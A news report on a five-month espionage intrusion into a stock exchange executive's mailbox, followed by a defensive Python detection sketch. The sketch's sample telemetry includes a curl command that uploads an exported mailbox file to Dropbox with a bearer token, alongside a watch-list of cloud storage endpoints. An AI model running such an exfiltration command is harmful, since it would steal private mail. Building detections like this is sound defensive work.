In a significant cyber espionage incident, hackers infiltrated the Outlook mailbox of a senior executive at a leading global stock exchange for over five months, according to a report by Symantec and Carbon Black’s Threat Hunter Team. The attackers stealthily extracted inbox contents using cloud services such as Dropbox and OneDrive to mask their activities among regular network traffic.
Methodical Espionage Operation
Revealed earlier this week, the attack appears driven by intelligence gathering rather than financial theft, as detailed by Symantec. The attackers accessed the executive’s mailbox, potentially exposing sensitive information like non-public listing details, market strategies, and private communications, which could influence market dynamics.
Initial malicious activity was detected on October 10, 2025, when attackers had already established control over the target system. They utilized two binaries operating at the highest Windows privilege level, posing as updates from Adobe and OneDrive. The precise method of the initial system breach remains unknown, though Symantec suggests lateral movement from a previously compromised device.
Stealthy Data Exfiltration
The operation intensified on November 12, 2025, with the hackers leveraging a Dropbox API token and utilizing the ‘curl’ command for data uploads. The primary tool was a mailbox stealer based on the Aspose .NET library, which converted and exported Outlook mailbox files. The attackers returned repeatedly every few weeks to capture new data, avoiding detection by mimicking regular system tasks and utilizing personal cloud storage for exfiltration.
To further blend in, the attackers connected to hard-coded Microsoft IP addresses, bypassing DNS lookups that could trigger security alerts. They also tested other public file hosting services but eventually focused on Dropbox and OneDrive for their exfiltration activities.
Unresolved Attribution and Defense Measures
The incident remains unattributed, with generic tools and consumer cloud services obscuring clear links to any known hacking groups. The attackers employed various tools for traffic tunneling and credential dumping, but the lack of specific identifiers leaves the responsible party unknown.
Security experts emphasize the importance of monitoring for unusual mailbox activities and data transfers to personal cloud accounts. Organizations, especially those dealing with market-sensitive information, are advised to integrate threat indicators and remain vigilant against similar tactics.
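Two of the behaviours described above lend themselves to simple telemetry checks: curl command lines that talk to consumer cloud storage, and outbound connections to addresses that no DNS answer on that host ever produced. The sketch below is an added example, not part of the Symantec report; the event format, hostnames, IP addresses and watched domains are constructed for illustration.

```python
from collections import defaultdict
import re

# Constructed sample telemetry (not from the report). IPs come from the RFC 5737
# documentation ranges; <TOKEN> stands in for an API token.
EVENTS = [
    {"ts": 1, "host": "ws01", "type": "dns", "answer": "198.51.100.10"},
    {"ts": 2, "host": "ws01", "type": "net", "dst": "198.51.100.10"},  # resolved first: normal
    {"ts": 3, "host": "ws01", "type": "net", "dst": "203.0.113.5"},    # never resolved: hard-coded
    {"ts": 4, "host": "ws01", "type": "proc",
     "cmd": r"C:\Windows\System32\curl.exe -H 'Authorization: Bearer <TOKEN>' "
            r"https://content.dropboxapi.com/2/files/upload --data-binary @export.pst"},
    {"ts": 5, "host": "ws02", "type": "proc", "cmd": "curl https://intranet.example/health"},
]

# Consumer file-hosting endpoints the analyst chooses to watch (assumed list; extend as needed).
CLOUD_STORAGE = re.compile(
    r"https?://[\w.-]*(dropboxapi\.com|dropbox\.com|onedrive\.live\.com|1drv\.ms)/", re.I)

def _exe_name(cmd):
    """Basename of the launched executable, handling Windows and POSIX path separators."""
    return re.split(r"[\\/]", cmd.split()[0])[-1].lower()

def curl_cloud_uploads(events):
    """Return (host, cmd) for curl invocations whose command line targets a watched storage host."""
    return [(e["host"], e["cmd"]) for e in events
            if e["type"] == "proc" and _exe_name(e["cmd"]) in ("curl", "curl.exe")
            and CLOUD_STORAGE.search(e["cmd"])]

def unresolved_destinations(events):
    """Return (host, dst) for outbound connections to an IP that no earlier DNS answer
    on the same host produced, i.e. a destination that skipped name resolution."""
    resolved = defaultdict(set)
    hits = []
    for e in sorted(events, key=lambda x: x["ts"]):
        if e["type"] == "dns":
            resolved[e["host"]].add(e["answer"])
        elif e["type"] == "net" and e["dst"] not in resolved[e["host"]]:
            hits.append((e["host"], e["dst"]))
    return hits

if __name__ == "__main__":
    for hit in curl_cloud_uploads(EVENTS) + unresolved_destinations(EVENTS):
        print("ALERT", hit)
```

The DNS check only works where the sensor sees the same host's resolver traffic; hosts behind a caching resolver or with long TTLs will need a persisted answer cache rather than the single in-memory pass shown here.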
This breach underscores an ongoing cybersecurity challenge: intrusions of this kind are not addressed by traditional patching. Instead, robust monitoring and response strategies are crucial to protecting valuable information assets.
